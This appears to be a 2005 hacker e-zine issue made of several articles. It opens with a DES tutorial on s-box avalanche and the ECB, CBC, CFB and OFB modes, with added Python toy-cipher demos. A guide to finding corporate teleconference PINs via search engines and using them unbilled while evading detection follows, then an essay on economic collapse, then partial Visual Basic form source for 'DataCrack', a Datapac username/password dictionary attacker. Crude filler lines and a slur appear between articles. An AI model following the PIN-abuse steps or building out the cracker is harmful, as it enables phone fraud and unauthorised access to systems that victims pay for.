situations, we think very directly. Because he has a car, he can drive to
work. If he has a job, he will be paid for his work. This extends to
crypto-thought in many ways: in a simple substitution cipher, if you change a
single letter so that plaintext "B" now becomes "D" instead of "R", every
instance of R in the ciphertext will change to D.
However, a more secure algorithm would set it so that if you change "B", both
"D" becomes "R" AND "S" becomes "T". In essence, we've changed things so that
altering a single plaintext character affects the outcome of multiple
ciphertext characters. Rather than a cause-effect ratio of 1:1 (1 cause :
1 effect), it becomes 1:2. According to avalanche philosophy, the greater the
ratio (1:50, 1:500), the more difficult it will be to deduce the plaintext
with solely the ciphertext.

But how does this relate to s-box strength? Well, if you change the s-box
contents at all, how much will it affect the ultimate ciphertext you get? For
example, if your s-box contains a 4*6 grid of 1 through 20, like such:

                              +-----------+
                              |1  2  3  4 |
                              |5  6  7  8 |
                              |9  10 11 12|
                              |13 14 15 16|
                              |17 18 19 20|
                              |21 22 23 24|
                              +-----------+

it does absolutely nothing. If you reverse the order (start with 24, end with
1) it makes it slightly secure, but an amateur cryptanalyst should be able to
decode it. Introduce more elements (repeat numbers, use different sequences,
random number generators, etc) and the result gets more obfuscated. For
example, an s-box created by the Fibonacci sequence will have a different
effect than one created by a random number generator. More so, different
randomness algorithms will have different effects.

But let's take it a step farther, incorporating the ratios: what if you
change two numbers and four in the ciphertext are changed? This makes reverse
engineering (trying to decipher the key through the cipher) far more
difficult. Better yet, say we formulate the s-boxes so that making a single
bit change in the plaintext changes -every- bit in the ciphertext? Now we can
better understand how the avalanche effect is seen in s-boxes. In thwarting
expert cryptanalysts, cycle iterations are far more useful when you have a
well-designed s-box with a significant avalanche effect.
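
The s-box comparison above, as an added example that is not part of the
original article: a constructed 16-bit toy cipher (not DES) run with the
count-upward table, the reversed table, and a nonlinear 4-bit s-box (the one
published for the PRESENT cipher), counting how many ciphertext bits flip per
flipped plaintext bit. The network layout, round count and all names are
assumptions made for the illustration.

```python
"""Avalanche measurement on a toy 16-bit substitution-permutation network.

Constructed for illustration: this is NOT DES. IDENTITY and REVERSED are the
"count upward" and "reverse the order" tables from the article, shrunk to
4 bits; NONLINEAR is the 4-bit s-box published for the PRESENT cipher.
"""
import random

IDENTITY = list(range(16))             # 0..15 in order: output equals input
REVERSED = list(range(15, -1, -1))     # 15..0: identical to x XOR 0xF, still affine
NONLINEAR = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD,
             0x3, 0xE, 0xF, 0x8, 0x4, 0x7, 0x1, 0x2]

ROUNDS = 4
# Bit permutation: output bit j of s-box i becomes input bit i of s-box j.
PERM = [(4 * i) % 15 if i != 15 else 15 for i in range(16)]


def substitute(state, sbox):
    """Run each of the four 4-bit nibbles through the s-box."""
    out = 0
    for nibble in range(4):
        out |= sbox[(state >> (4 * nibble)) & 0xF] << (4 * nibble)
    return out


def permute(state):
    """Move every set bit to its new position according to PERM."""
    out = 0
    for bit in range(16):
        if state >> bit & 1:
            out |= 1 << PERM[bit]
    return out


def encrypt(block, round_keys, sbox):
    """Key mixing, substitution and permutation per round, then a final key."""
    state = block
    for rk in round_keys[:-1]:
        state = permute(substitute(state ^ rk, sbox))
    return state ^ round_keys[-1]


def avalanche(sbox, samples=200, seed=2005):
    """Return (min, mean, max) ciphertext bits flipped per flipped plaintext bit."""
    rng = random.Random(seed)          # fixed seed: constructed, repeatable sample
    round_keys = [rng.getrandbits(16) for _ in range(ROUNDS + 1)]
    counts = []
    for _ in range(samples):
        pt = rng.getrandbits(16)
        base = encrypt(pt, round_keys, sbox)
        for bit in range(16):
            diff = base ^ encrypt(pt ^ (1 << bit), round_keys, sbox)
            counts.append(bin(diff).count("1"))
    return min(counts), sum(counts) / len(counts), max(counts)


if __name__ == "__main__":
    for name, box in (("identity", IDENTITY), ("reversed", REVERSED),
                      ("nonlinear", NONLINEAR)):
        lo, mean, hi = avalanche(box)
        print(f"{name:9} min={lo} mean={mean:.2f} max={hi} of 16 bits")
```

With the ordered and the reversed table every flipped plaintext bit moves
exactly one ciphertext bit, however many rounds are run; only the nonlinear
table spreads the change across the block.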

Although we left them on a pale horse in the last article, s-box strength can
make or break a decent algorithm. However, our DES structure is still
insecure. Let's examine our current security elements: we have a key based on
pseudo-random characters, with little visible pattern and isolated ASCII
characters; our s-boxes, the heart of our system, are fastened with the most
avalanche-inducing number generator possible; but there's still something
missing. Now that we have pumped up the parts of a single cycle, we need to
be concerned with the iterations themselves. This is where we get into cipher
block operation modes.

----------------------------+
 The Four Pillars of DEStiny|
----------------------------+

As we established in the first article, DES is a block cipher, meaning that
data is processed in blocks of data, rather than streamed through. For each
cycle, we have a chunk of plaintext, a generated chunk of key, and a general
operation mode that's performed on the entire body. There are four main
modes: Electronic Codebook (ECB), Cipher Block Chaining (CBC), Cipher
Feedback (CFB), and Output Feedback (OFB).

ECB is the default mode we've been using so far, aptly named because, as each
cycle uses a fresh plaintext input and key, multiple cycles essentially
generate a "code book" where each chunk can be traced to its ciphertext. Good
for explanation, but dreadful for security.

CBC makes DES somewhat more secure. With CBC, the output ciphertext of the
cycle is xored with the input plaintext of the next cycle before the
encryption process occurs. Let's look at a diagram to illustrate this point:

                 -~+ CIPHER BLOCK CHAINING MODE +~-

   Output          Input                 Input
   from            current               next
   previous         PT                    PT
     |               |                     |
     +---->------+ (xor)           +---+ (xor)
                     |             |       |
              +------------+       |  +--------+
              |    DES     |       |  |next DES|
       key ->-|  encrypt   |       |  | encrypt|
              +------------+       |  +--------+
                     |             |       |
                    CT  +-->-------+       +--next CT

Of course, this picture assumes we're in the middle of multiple cycles.
The main point to remember is that the output from the previous cycle becomes
part of the input for the next. To clarify: if you're mixing meat and tomato
sauce, the output will be spaghetti sauce. The sauce then becomes input for
the pasta you've prepared, and the cooking algorithm creates an Italian
dinner :) The xoring process creates a link between the cycles, so that
instead of being able to use a plaintext/key chunk and have a corresponding
ciphertext, each subsequent cycle will change depending on the order. Thus,
instead of having a code book of cycles, we have a system that's chained
together, where each cycle is dependent on the others. Remember that
avalanching concept? ;) This makes the system more secure on a level parallel
to a Vernam cipher.

CFB, on the other hand, takes the next step and applies a cycling shift
register scheme. To get an idea of how this works, let's first imagine two
wheels-- a large wheel and a small wheel-- rotating at the same speed. If you
draw a chalk mark on the edge of each wheel, you'll notice that as they
rotate, the chalk mark on the smaller wheel seems to rotate much more
quickly. This is because the mark on the big wheel has much more ground to
cover, and a single rotation of the small wheel doesn't provide enough time
for the big mark to finish. Here's how this relates to CFB: we actually have
-two- different operations going on at the same time-- the typical shifting
going on inside each cycle, and an additional shift operation mixed with the
cyclic xor that rotates a small amount (let's say 8 bits) per cycle.
Once again, a picture should help clarify that jargon:

                    -~+ Cipher Feedback Mode +~-

 Last Cycle             +--------------+          +-------+
      +                 |  Shift Reg   |          | Next  |
      |            +----| 64-8 | 8 bits|       +--| Cycle |
+------------+     |    +--------------+       |  +-------+
| Shift Reg  |     |            |              |
| 64-8|8bits |     |      +-----------+        |
+------------+     | key--|    DES    |        |
      |            |      |  encrypt  |        |
    (xor) +-->------+     +-----------+        ^
      |                     CT  |              |
      PT                +--------------+       |
                        |  Shift Reg   |       |CT
                        | 64-8 | 8 bits|       |
                        +--------------+       |
                                   |           |(xor)
                                   +-->--------+------<-----PT

The curious bits here involve the mysterious shift registers that have shown
up before and after the DES encryption, and the "8 bits" notes everywhere.
Let's watch a cycle. We draw input from the ciphertext of the previous cycle,
and the leftmost (most significant) 8 bits from the ciphertext are xored with
the first bit of plaintext. This is then shifted so that the xored bits
become the 8 rightmost bits, and the encryption continues. When we get back
to the xoring with plaintext, we repeat the cycle of rotation until
eventually all bits have been xored. Therefore, the smaller wheel, the one
whose mark rotates faster, is the individual DES encryption within each
cycle, while the larger wheel consists of the ultimate xoring of plaintext
and input ciphertext.

The final mode, OFB, is similar to the CFB mode, except that the ciphertext
from the cycle is output before the xoring process with the plaintext occurs.
This helps with parity, and assures that errors in transmission don't
continue to the next cycle. However, because the xoring step is removed, it
makes this mode slightly more vulnerable.

Overall, there are many aspects of DES which, if focused on, could be made
much stronger. While there remain many criticisms, the basic techniques and
thought used for cryptanalysis in this article can easily be extended onto
other algorithms using similar concepts, and in general are useful for
understanding both composition of and deconstruction of cryptosystems.
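
The four modes above, as an added example that is not part of the original
article: each mode is written to its standard definition (FIPS 81) around a
constructed 64-bit Feistel stand-in, not real DES, and the script checks
whether repeated plaintext blocks show through and how far one flipped
ciphertext bit spreads on decryption. The key, IV, message and all function
names are assumptions made for the illustration.

```python
"""ECB, CBC, 8-bit CFB and OFB built around one 64-bit block primitive.

Constructed for illustration: toy_encrypt/toy_decrypt are a 4-round Feistel
stand-in with the DES block size. They are NOT DES and not secure.
"""
import hashlib

BLOCK = 8  # bytes per block (64 bits, as in DES)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half, key, n):
    # Round function of the stand-in cipher: a keyed hash cut to 32 bits.
    return hashlib.sha256(key + bytes([n]) + half).digest()[:4]


def toy_encrypt(key, block):
    left, right = block[:4], block[4:]
    for n in range(4):
        left, right = right, _xor(left, _round(right, key, n))
    return left + right


def toy_decrypt(key, block):
    left, right = block[:4], block[4:]
    for n in reversed(range(4)):
        left, right = _xor(right, _round(left, key, n)), left
    return left + right


def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb(key, iv, data, decrypt=False):
    op = toy_decrypt if decrypt else toy_encrypt
    return b"".join(op(key, b) for b in _blocks(data))   # iv unused: no chaining


def cbc(key, iv, data, decrypt=False):
    prev, out = iv, []
    for b in _blocks(data):
        if decrypt:
            out.append(_xor(toy_decrypt(key, b), prev))
            prev = b
        else:
            prev = toy_encrypt(key, _xor(b, prev))       # previous CT xor next PT
            out.append(prev)
    return b"".join(out)


def cfb8(key, iv, data, decrypt=False):
    reg, out = iv, bytearray()
    for byte in data:
        out.append(toy_encrypt(key, reg)[0] ^ byte)      # leftmost 8 bits of E(reg)
        ct_byte = byte if decrypt else out[-1]
        reg = reg[1:] + bytes([ct_byte])                 # shift 8 bits, feed CT back
    return bytes(out)


def ofb(key, iv, data, decrypt=False):
    reg, out = iv, bytearray()
    for i, byte in enumerate(data):
        if i % BLOCK == 0:
            reg = toy_encrypt(key, reg)                  # keystream ignores PT and CT
        out.append(byte ^ reg[i % BLOCK])
    return bytes(out)


# Constructed sample values: two identical blocks followed by 16 other bytes.
KEY = b"samplkey"
IV = bytes.fromhex("0123456789abcdef")
MESSAGE = b"SAMEBLOK" * 2 + b"0123456789abcdef"


def repeats_leak(mode):
    """True if two equal plaintext blocks give two equal ciphertext blocks."""
    ct = mode(KEY, IV, MESSAGE)
    return ct[:BLOCK] == ct[BLOCK:2 * BLOCK]


def damaged_offsets(mode):
    """Flip one bit of ciphertext byte 0; list plaintext offsets that decrypt wrong."""
    ct = bytearray(mode(KEY, IV, MESSAGE))
    ct[0] ^= 0x01
    garbled = mode(KEY, IV, bytes(ct), decrypt=True)
    return [i for i, (a, b) in enumerate(zip(garbled, MESSAGE)) if a != b]


if __name__ == "__main__":
    for mode in (ecb, cbc, cfb8, ofb):
        print(f"{mode.__name__:5} repeats_leak={repeats_leak(mode)!s:5} "
              f"damaged={damaged_offsets(mode)}")
```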

------------+
 References:|
------------+

All the same as the first article, as well as _Handbook of Applied
Cryptography_ by Menezes, van Oorschot, and Vanstone

-----------+
 Shoutouts:|
-----------+

Thanks to The Clone, who bitched, whined, and nagged until I finally wrote
this. To ProffEKS for your laptop... also to various geeks in #binrev on
dalnet, se2600, mw2600, and of course #hackcanada.

+-aestetix
  aestetix@aestetix.net
  http://www.aestetix.net
  20 May 2005

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Man, My dick pumps out 90,000 megawatts of juice every day!
And your boyfriends love it.

               The Guide to Using Google to Get Free CONFZ

Teleconferences. Confs. What are they? Essentially they are like party lines.
Dial them up, and a bunch of people might be on. Why would you want to do
this? For fun, or to make prank calls where multiple people can listen, or to
trade l33t codes or exchange ideas. You can also 3rd party bill with some,
and you can probably even use it as a diverter point with modems. You can
dial in from one phone number, have your modem listen, then dial in from
another point on the planet and get your modem to connect to it. There are
more uses for teleconfs, but I'm sure most of them are obvious.

In the past, people beige boxed or used COCOTs to set up teleconferences.
They would dial one up, talk to the operator and tell them they would like to
set up a teleconference. The operator would ask them how they would like to
pay for it. The phreak would then say "I want to charge it to my number". The
operator would then ask for the number, and the phreak would give them the
number of the COCOT or the number of the pair they are beiging from.
They would both hang up and the operator would dial the number back to make
sure that the number and the person being charged is "legit". They would then
be given 2 pins: the moderator pin and the user pin. The user pin is what
everyone uses and the moderator pin is what the moderator uses (really hard
to figure out, eh?). The phreak would then share his conf with other people
who would then dial it up.

Ok, enough of what you probably already know. Here is the way we do it in the
year 2005 in three easy steps:

1) Go to google
2) Google the teleconference 800 number (Example: 1-800-315-6338).
3) Sift through the results for the PIN numbers and try them to see if they
   work.

I know many people have known about this and have been doing this for years
now. This isn't exactly new stuff, but I think there are a lot of people out
there who do not know about this stuff and would like to. I was doing this
about a year and a half ago and am finding more hits now than I did then,
well, at least hits with pins that work anyways. In a session of searching
for conf pins that worked I found 3 different confs in about an hour, and
lots more results that I didn't bother to check. I mean, if you have 3
conference numbers why would you need more? Why would you even need more than
one?

A few notes before I close up.

- I would highly recommend *NOT* using your home line for phoning confs. I
  have heard stories of people being _RAIDED_ just because they phoned a conf
  from their house. I don't know if this is true or not, but on the telephone
  bill they will see all numbers that dialed the conf, this I am sure of.

- Try using other search engines besides google. You may find more results or
  different results that google doesn't show.

- At night is the best time to conf/check pins because during the day there
  might be legitimate conferences going on, and popping onto a conf and being
  like "WORD UP MY FRIENDS!"
  and being greeted by company executives is not only embarrassing, but also
  irresponsible because the company is more likely to investigate. In a post
  9/11 world, you might even be accused of industrial espionage and/or
  terrorism because you phoned a conf and might have heard some executives
  say something confidential.

- Try to see if you have moderator privileges and see if you can summon an
  operator. They might be able to dial out for you.

- The conferences you will find will last until about the end of the month.
  Most conferences that are set up are set to terminate at the end of the
  month. This is also when the company gets their phone bill and sees all the
  fraudulent calls. So if you need a conf number, the best time to get one is
  at the very beginning of the month.

Props to: Sandnigger, FatBob, NetSpread, Doc_X and The Clone.

-Aftermath
 aftermath12345@hotmail.com

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

DON'T DRINK AND DRIVE
I'm bert and I'm gert stay alert, and stay safe.

                      The Inevitable Crash of Society

                 Cybur Netiks (cybur_netiks@Phreaker.net)
                  -=http://hackdaplanet.freespaces.com=-

Hello, it's been a while since I wrote my last article, I have been busy, and
so is everybody else it seems. I have been busy on the ridiculous number of
projects I take on at once, but most people out there are busy just trying to
maintain life. Now most people would think that it's not that bad, well look
over your bills and pay cheques over the last few years, unless you have had
some large promotion or sudden monetary gain over the past years, you will
probably see how much your cost of living has gone up and your income has
gone down.

Now, why is this? Most people nowadays simply blame it on rising fuel costs,
and while this is a big part of it, it is not the only part of it. If you
were to look back on history in very fine detail, you may notice that the
very basis of our society has been the same for at least 2000 years. Don't
believe me?
What is at the base of our economy? Not fuel, not money, but people. People
spend their whole lives working to put energy towards keeping society alive
for just one more day, every day you get up, go to work, and lose more than
half your earnings to the system.

Now, we do not know of anything that is perpetual, but society pushes on with
the illusion of being perpetual, but again, look back on history, every so
often, society crashes (the most recent one being the 1930's) and after every
crash comes a large event to start the motion all over again (world war II,
now I don't blame our governments for starting it, but it was going to happen
sooner or later) but again, the motion can only last so long, then comes
inflation, the energy supply will wear down while the demand increases
(decreased earnings, increased costs) until there is not enough energy to
power the motion, then it will crash and most likely be started again. This
is a fairly simple scientific and mathematical concept (the following is
mostly just opinion).

The US is trying something different now, they see the crash coming and are
trying to avoid it from happening by boosting society now instead of after
the crash, look on the news, they are picking on new countries all the time,
and even plan to invade some but never do, it seems they are picking their
fights, they are just picking on little guys, building up resources
desperately hoping to shelter themselves from yet another crash.

I can't tell you when society will crash, I am no mathematician, but I can
say this, it will happen eventually, and the hardest hit will not be the ones
who have very little, but rather those who have all the money in the world.
If a man who expects to lose his house any day now loses his house, it will
come as little shock to him, and a man who lives on the street will barely
notice the difference, but a man in an upper scale riverside house who loses
his well-paying job due to downsizing, he will be hit very hard and will be
likely to have a breakdown or even commit suicide, the shock will be just too
much for him to handle.

So the next time you see a man asking for change on a street corner, or
sorting through a trash can for a couple of bottles, don't shun him, just
think, he could not be more prepared for the crash of society.

Copyright (c) 2005 hackdaplanet

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

I don't often masturbate in public

                Datapac Hacker's Kit: DataCrack Source Code

by: Aftermath

Download it at:
http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar

According to Hack Canada:
"Includes the Datascan NUA scanner and the Datacrack username/password
dictionary attacker for windows. VB source code included."
(Notes: Form1.FRX and frmAbout.FRX excluded due to mangled code)

- Form1.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form1
   BorderStyle = 1 'Fixed Single
   Caption = "DataCrack - datapac dictionary attacker"
   ClientHeight = 5190
   ClientLeft = 405
   ClientTop = 2235
   ClientWidth = 8475
   Icon = "Form1.frx":0000
   LinkTopic = "Form1"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 5190
   ScaleWidth = 8475
   Begin VB.Timer Timer6
      Left = 3840
      Top = 1680
   End
   Begin VB.Timer Timer5
      Left = 3840
      Top = 1560
   End
   Begin VB.Frame Frame5
      Caption = "Extra data to send:"
      Height = 5175
      Left = 4440
      TabIndex = 36
      Top = 0
      Width = 3975
      Begin VB.Frame Frame8
         Caption = "data to send after sending address"
         Height = 1335
         Left = 120
         TabIndex = 53
         Top = 3720
         Width = 3735
         Begin VB.TextBox txtaddressreturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 56
            Text = "0"
            ToolTipText = "send this amount of return keys after extra data is sent after the address is sent"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtaddress1
            Height = 285
            Left = 120
            TabIndex = 54
            ToolTipText = "put data in here that you need sent after the address has been sent"
            Top = 360
            Width = 3495
         End
         Begin VB.Label Label24
            Caption = "time(s)"
            Height = 255
            Left = 2760
            TabIndex = 57
            Top = 840
            Width = 495
         End
         Begin VB.Label Label23
            Caption = "send extra Return Key(s)"
            Height = 255
            Left = 480
            TabIndex = 55
            Top = 840
            Width = 1815
         End
      End
      Begin VB.Frame Frame7
         Caption = "data to send after password is sent"
         Height = 1575
         Left = 120
         TabIndex = 38
         Top = 2040
         Width = 3735
         Begin VB.TextBox txtpasscycle
            Enabled = 0 'False
            Height = 285
            Left = 1560
            TabIndex = 51
            Text = "0"
            ToolTipText = "send this extra data ever n amount of cycles"
            Top = 1200
            Width = 375
         End
         Begin VB.TextBox txtpassreturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 48
            Text = "0"
            ToolTipText = "put the number of return keys you need to send after the extra data"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtpasssend1
            Height = 285
            Left = 120
            TabIndex = 46
            ToolTipText = "put data in here that you want to be sent after the password has been sent"
            Top = 360
            Width = 3495
         End
         Begin VB.Label Label22
            AutoSize = -1 'True
            Caption = "cycles"
            Height = 195
            Left = 2160
            TabIndex = 52
            Top = 1200
            Width = 450
         End
         Begin VB.Label Label21
            AutoSize = -1 'True
            Caption = "do this every"
            Height = 195
            Left = 480
            TabIndex = 50
            Top = 1200
            Width = 900
         End
         Begin VB.Label Label20
            Caption = "time(s)"
            Height = 255
            Left = 2880
            TabIndex = 49
            Top = 840
            Width = 495
         End
         Begin VB.Label Label19
            AutoSize = -1 'True
            Caption = "send extra Return Keys "
            Height = 195
            Left = 480
            TabIndex = 47
            Top = 840
            Width = 1695
         End
      End
      Begin VB.Frame Frame6
         Caption = "data to send after username is sent:"
         Height = 1695
         Left = 120
         TabIndex = 37
         Top = 240
         Width = 3735
         Begin VB.TextBox txtusernamecycles
            Enabled = 0 'False
            Height = 285
            Left = 1440
            TabIndex = 44
            Text = "0"
            ToolTipText = "send extra data and extra return keys every n amount of cycles"
            Top = 1200
            Width = 375
         End
         Begin VB.TextBox txtusernamereturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 41
            Text = "0"
            ToolTipText = "send n amount of return keys to the host after username and extra data is sent"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtusernamesend1
            Height = 285
            Left = 120
            TabIndex = 39
            ToolTipText = "put data in here that is to be sent to terminal client after username is sent. Leave blank for no send."
            Top = 240
            Width = 3495
         End
         Begin VB.Label Label18
            AutoSize = -1 'True
            Caption = "cycles"
            Height = 195
            Left = 1920
            TabIndex = 45
            Top = 1200
            Width = 450
         End
         Begin VB.Label Label16
            AutoSize = -1 'True
            Caption = "do this every"
            Height = 195
            Left = 480
            TabIndex = 43
            Top = 1200
            Width = 900
         End
         Begin VB.Label Label14
            AutoSize = -1 'True
            Caption = "time(s)"
            Height = 195
            Left = 2760
            TabIndex = 42
            Top = 720
            Width = 450
         End
         Begin VB.Label Label12
            AutoSize = -1 'True
            Caption = "send extra Return Keys"
            Height = 195
            Left = 480
            TabIndex = 40
            Top = 720
            Width = 1650
         End
      End
   End
   Begin VB.CommandButton cmdstop
      Caption = "Stop"
      Default = -1 'True
      Height = 735
      Left = 1440
      TabIndex = 35
      ToolTipText = "click here to reset/stop the attack"
      Top = 4440
      Width = 1455
   End
   Begin VB.CommandButton cmdstart
      Caption = "Start"
      Height = 735
      Left = 0
      TabIndex = 34
      ToolTipText = "start attack"
      Top = 4440
      Width = 1335
   End
   Begin VB.CommandButton cmdhelp
      Caption = "Help"
      Height = 735
      Left = 3000
      TabIndex = 33
      Top = 4440
      Width = 1335
   End
   Begin VB.Frame Frame4
      Caption = "Stats and results:"
      Height = 1095
      Left = 0
      TabIndex = 24
      Top = 3240
      Width = 4335
      Begin VB.Shape Shape1
         BackColor = &H000000FF&
         BackStyle = 1 'Opaque
         BorderColor = &H00FF0000&
         FillColor = &H000000FF&
         FillStyle = 0 'Solid
         Height = 375
         Left = 3120
         Shape = 2 'Oval
         Top = 240
         Width = 975
      End
      Begin VB.Label lbltimerunning
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 2400
         TabIndex = 32
         ToolTipText = "time the attack started at"
         Top = 720
         Width = 1815
      End
      Begin VB.Label Label17
         Caption = "Running since:"
         Height = 375
         Left = 1680
         TabIndex = 31
         Top = 600
         Width = 735
      End
      Begin VB.Label lblpercentcomplete
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 840
         TabIndex = 30
         ToolTipText = "percentage complete"
         Top = 720
         Width = 735
      End
      Begin VB.Label Label15
         Caption = "% complete:"
         Height = 435
         Left = 120
         TabIndex = 29
         Top = 600
         Width = 705
      End
      Begin VB.Label lbltotalcycle
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 2160
         TabIndex = 28
         ToolTipText = "total cycle count"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label13
         Caption = "of:"
         Height = 255
         Left = 1800
         TabIndex = 27
         Top = 240
         Width = 255
      End
      Begin VB.Label lblcurrentcycle
         BorderStyle = 1 'Fixed Single
         Caption = "0"
         Height = 255
         Left = 840
         TabIndex = 26
         ToolTipText = "current cycle count"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label11
         Caption = "on cycle: "
         Height = 255
         Left = 120
         TabIndex = 25
         Top = 240
         Width = 735
      End
   End
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 3720
      Top = 2640
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.Timer Timer4
      Left = 3840
      Top = 1440
   End
   Begin VB.Timer Timer3
      Left = 3840
      Top = 1320
   End
   Begin VB.Timer Timer2
      Left = 3840
      Top = 1200
   End
   Begin VB.Timer Timer1
      Left = 3840
      Top = 1080
   End
   Begin VB.Frame Frame3
      Caption = "Timing"
      Height = 1335
      Left = 0
      TabIndex = 13
      Top = 1920
      Width = 4335
      Begin VB.TextBox txtwaitpassword
         Height = 285
         Left = 600
         TabIndex = 21
         Text = "2000"
         ToolTipText = "this is the amount of time to wait before the password is sent."
         Top = 960
         Width = 735
      End
      Begin VB.TextBox txtwaitusername
         Height = 285
         Left = 600
         TabIndex = 18
         Text = "2000"
         ToolTipText = "this is the amount of seconds to wait after the username is sent"
         Top = 600
         Width = 735
      End
      Begin VB.TextBox txtwaitsendkeys
         Height = 285
         Left = 600
         TabIndex = 15
         Text = "3000"
         ToolTipText = "this is the amount of time you wait before the attack starts"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label10
         AutoSize = -1 'True
         Caption = "Miliseconds after password is sent"
         Height = 195
         Left = 1440
         TabIndex = 22
         Top = 960
         Width = 2400
      End
      Begin VB.Label Label9
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 20
         Top = 960
         Width = 330
      End
      Begin VB.Label Label8
         AutoSize = -1 'True
         Caption = "Miliseconds after username is sent"
         Height = 195
         Left = 1440
         TabIndex = 19
         Top = 600
         Width = 2415
      End
      Begin VB.Label Label7
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 17
         Top = 600
         Width = 330
      End
      Begin VB.Label Label6
         AutoSize = -1 'True
         Caption = "Miliseconds before starting SendKeys()"
         Height = 195
         Left = 1440
         TabIndex = 16
         Top = 240
         Width = 2730
      End
      Begin VB.Label Label5
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 14
         Top = 240
         Width = 330
      End
   End
   Begin VB.Frame Frame2
      Caption = "NUA Address"
      Height = 975
      Left = 0
      TabIndex = 7
      Top = 960
      Width = 4335
      Begin VB.CheckBox chkperiod
         Caption = "send period(.)"
         Height = 375
         Left = 3240
         TabIndex = 23
         ToolTipText = "this sends the period that initates the datapac connection"
         Top = 480
         Width = 975
      End
      Begin VB.TextBox txtsendaddress
         Enabled = 0 'False
         Height = 285
         Left = 1680
         TabIndex = 11
         Text = "1"
         ToolTipText = "send the address every n cycle. Use this if you only get three tries per session with the target host."
         Top = 600
         Width = 375
      End
      Begin VB.CheckBox chkaddress
         Caption = "send address more than once"
         Height = 375
         Left = 1320
         TabIndex = 9
         ToolTipText = "check this box if you need to send the address more than once (use if you only get three tries before disconnect etc)"
         Top = 120
         Width = 2415
      End
      Begin VB.TextBox txtaddress
         Height = 285
         Left = 120
         TabIndex = 8
         Text = "10000500"
         ToolTipText = "put the datapac address here"
         Top = 240
         Width = 1095
      End
      Begin VB.Label Label4
         Caption = "Cycle(s)"
         Enabled = 0 'False
         Height = 255
         Left = 2160
         TabIndex = 12
         Top = 600
         Width = 615
      End
      Begin VB.Label Label3
         Caption = "Send Address every:"
         Enabled = 0 'False
         Height = 255
         Left = 120
         TabIndex = 10
         Top = 600
         Width = 1575
      End
   End
   Begin VB.Frame Frame1
      Caption = "File Paths"
      Height = 975
      Left = 0
      TabIndex = 0
      Top = 0
      Width = 4335
      Begin VB.CheckBox chkusername
         Caption = "Check1"
         Height = 255
         Left = 3600
         TabIndex = 58
         ToolTipText = "uncheck this if you only need to use passwords"
         Top = 240
         Value = 1 'Checked
         Width = 255
      End
      Begin VB.CommandButton cmdcommondialog2
         Caption = "..."
         Height = 255
         Left = 3960
         TabIndex = 6
         ToolTipText = "change path"
         Top = 600
         Width = 255
      End
      Begin VB.TextBox txtpasswords
         Height = 285
         Left = 960
         TabIndex = 5
         Text = "c:\pw.txt"
         ToolTipText = "path to the file with the password list"
         Top = 600
         Width = 2895
      End
      Begin VB.CommandButton cmdcommondialog1
         Caption = "..."
         Height = 255
         Left = 3960
         TabIndex = 3
         ToolTipText = "change path"
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtusernames
         Height = 285
         Left = 960
         TabIndex = 1
         Text = "c:\users.txt"
         ToolTipText = "path to the file with the usernames"
         Top = 240
         Width = 2535
      End
      Begin VB.Label Label2
         Caption = "passwords:"
         Height = 255
         Left = 120
         TabIndex = 4
         Top = 600
         Width = 855
      End
      Begin VB.Label Label1
         Caption = "usernames:"
         Height = 255
         Left = 120
         TabIndex = 2
         Top = 240
         Width = 855
      End
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'yet another program that has to do with datapac hacking and uses the sendkeys() function
'god dayum. I wish my modem wasnt such a stupid peice of shit or i'd be using
'the mscomm component right now. Stupid stupid stupid stupid fucking modem D:
'Oh, and about this code. It was extreemly hard for me to write because of the
'variable names I used. If you dont understand, you will in a minute..
'i dedicate this program to the memory of Doctor Hunter S Thompson.
'Hunter was a good man. He spoke truth in his words.
'Long live the memory of the good doctor.
'RIP HST
Public hst, gonzo As String
Public lsd, hells_anges, strippers, american_dream As Boolean
Public mescaline As Integer
Public fuck_nixon, fear_and_loathing, lono, generation, sheriff, white_rabbit, politics As Integer

Private Sub chkaddress_Click()
    If chkaddress.Value = Checked Then
        Label3.Enabled = True
        txtsendaddress.Enabled = True
        Label4.Enabled = True
    Else
        Label3.Enabled = False
        txtsendaddress.Enabled = False
        Label4.Enabled = False
    End If
End Sub

Private Sub cmdcommondialog1_Click()
    CommonDialog1.ShowOpen
    txtusernames.Text = CommonDialog1.FileName
End Sub

Private Sub cmdcommondialog2_Click()
    CommonDialog1.ShowOpen
    txtpasswords.Text = CommonDialog1.FileName
End Sub

